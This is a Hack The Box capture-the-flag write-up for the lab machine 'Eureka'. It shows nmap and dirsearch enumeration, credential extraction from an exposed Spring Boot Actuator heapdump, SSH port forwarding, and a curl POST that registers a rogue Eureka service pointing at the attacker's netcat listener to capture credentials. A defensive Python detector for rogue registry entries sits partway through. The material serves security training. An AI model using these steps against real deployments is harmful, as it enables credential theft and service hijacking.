Eureka HTB Writeup - HacktheBox - lazyhackers
Eureka is a non-seasonal Linux-based machine on Hack The Box, categorized as a Hard challenge. Upon completing this box, you earn 40 points. The machine teaches you how exposed Spring Boot Actuator endpoints can leak sensitive internal assets. By analyzing these endpoints, you eventually discover a heap dump that reveals credentials, allowing initial access. From there, you exploit Eureka by performing a malicious service registration to escalate privileges and gain further control of the system.
2025-05-04 03:04:42 - xone
Reconnaissance
Let's start with setting the target IP as an environment variable for convenience:
export IP='10.10.11.66'
Run a full TCP port scan with default scripts and service/version detection:
nmap -v -sCTV -p- -T4 -Pn -oN $IP.txt $IP
Nmap Results:
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
8761/tcp open  http    Apache Tomcat (language: en)
- Port 80 redirects to http://furni.htb/, so we add it to /etc/hosts:
echo "$IP furni.htb" | sudo tee -a /etc/hosts
Web Enumeration
Now, let's use dirsearch to brute-force directories on the web server:
dirsearch -u http://furni.htb/ -e php,html,txt -t 50
Discovered Endpoints:
/actuator/env
/actuator/features
/actuator/health
/actuator/info
/actuator/metrics
/actuator/configprops
/actuator/beans
/actuator/threaddump
/actuator/loggers
/actuator/mappings
/actuator/heapdump   <- Interesting!
Heapdump Extraction
Downloaded the heapdump:
http://furni.htb/actuator/heapdump
Analyzed the file using strings:
strings heapdump | grep "password="
Credentials Found:
{password=0***********&, user=o*********}
Another one found using:
strings heapdump | grep PWD
http://EurekaSrvr:****************@localhost:8761/eureka
Initial Foothold
Login via SSH:
ssh ********@10.10.11.66
Password: ************
We are now logged in as O*****.
Port Forwarding
Since port 8761 is interesting and only bound locally on the target, we forward it to our own machine:
ssh -L 8761:localhost:8761 ******@10.10.11.66
Access the Eureka admin panel via browser:
http://localhost:8761
Exploiting Eureka with Malicious Registration
Start a netcat listener to receive a reverse shell or connection:
nc -lvnp 8081
Now register a malicious fake service using the stolen Eureka credentials:
curl -X POST http://USERNAME:PASSWORD@127.0.0.1:8761/eureka/apps/USER-MANAGEMENT-SERVICE \
  -H 'Content-Type: application/json' \
  -d '{
  "instance": {
    "instanceId": "USER-MANAGEMENT-SERVICE",
    "hostName": "YOURIP",
    "app": "USER-MANAGEMENT-SERVICE",
    "ipAddr": "YOURIP",
    "vipAddress": "USER-MANAGEMENT-SERVICE",
    "secureVipAddress": "USER-MANAGEMENT-SERVICE",
    "status": "UP",
    "port": { "$": 8081, "@enabled": "true" },
    "dataCenterInfo": {
      "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
      "name": "MyOwn"
    }
  }
}'
Replace USERNAME and PASSWORD with the EurekaSrvr credentials recovered from the heap dump.
Replace YOURIP with your tun0 IP.
After a short wait (~2 minutes), we receive credentials via netcat:
Username: mi**********
Password: IL***********
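From the defender's side, the registration above leaves a trace in the registry itself: an instance of USER-MANAGEMENT-SERVICE whose ipAddr points outside the hosts that service is supposed to run on. The following is an added example, not code from the writeup or from Eureka; it parses a constructed /eureka/apps JSON document (following the registry's JSON shape) and flags instances registered from outside an assumed allow-list of networks.

```python
import ipaddress
import json

# Constructed sample of a GET /eureka/apps response (Accept: application/json).
# It carries a legitimate USER-MANAGEMENT-SERVICE instance on localhost and a
# second one registered from an outside host under the same app name.
SAMPLE_REGISTRY = json.loads("""
{"applications": {"application": [
  {"name": "USER-MANAGEMENT-SERVICE", "instance": [
    {"instanceId": "localhost:user-management-service:8081", "hostName": "localhost",
     "app": "USER-MANAGEMENT-SERVICE", "ipAddr": "127.0.0.1", "status": "UP",
     "port": {"$": 8081, "@enabled": "true"}},
    {"instanceId": "USER-MANAGEMENT-SERVICE", "hostName": "10.10.14.5",
     "app": "USER-MANAGEMENT-SERVICE", "ipAddr": "10.10.14.5", "status": "UP",
     "port": {"$": 8081, "@enabled": "true"}}
  ]},
  {"name": "FURNI", "instance": [
    {"instanceId": "localhost:furni:8082", "hostName": "localhost",
     "app": "FURNI", "ipAddr": "127.0.0.1", "status": "UP",
     "port": {"$": 8082, "@enabled": "true"}}
  ]}
]}}
""")


def iter_instances(registry):
    """Yield (app_name, instance) for every instance in a /eureka/apps document."""
    for app in registry.get("applications", {}).get("application", []):
        for inst in app.get("instance", []):
            yield app.get("name", "?"), inst


def find_rogue_instances(registry, allowed_cidrs):
    """Return registered instances whose ipAddr lies outside the allowed networks."""
    allowed = [ipaddress.ip_network(c) for c in allowed_cidrs]  # assumed allow-list
    rogue = []
    for app_name, inst in iter_instances(registry):
        hit = {"app": app_name, "instanceId": inst.get("instanceId")}
        try:
            addr = ipaddress.ip_address(inst.get("ipAddr", ""))
        except ValueError:
            rogue.append({**hit, "reason": "unparseable ipAddr"})
            continue
        if not any(addr in net for net in allowed):
            rogue.append({**hit, "ipAddr": str(addr), "reason": "outside allowed networks"})
    return rogue


if __name__ == "__main__":
    for hit in find_rogue_instances(SAMPLE_REGISTRY, ["127.0.0.0/8"]):
        print(hit)
```

Against a live registry, replace SAMPLE_REGISTRY with the parsed body of GET /eureka/apps fetched with the Accept: application/json header and run the check on a schedule, since the rogue entry only has to stay registered long enough for a client to pick it up.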
Privilege Escalation
Login as the new user:
ssh mi*******@10.10.11.66
Password: I**********
Now you're logged in as a more privileged user.
Grab the user flag:
cat ~/user.txt
Summary
- Found hidden directories using Dirsearch
- Extracted credentials from heapdump
- Used SSH and port forwarding to access Eureka dashboard
- Exploited service registration to gain new credentials
- Escalated privileges and got the user flag
Tools Used
- nmap
- dirsearch
- strings
- ssh + port forwarding
- curl
- netcat
Root
Access is restricted by HackTheBox rules
The solution to this part can be published publicly once the machine is retired.
Look for the non-public solution in the Telegram channel .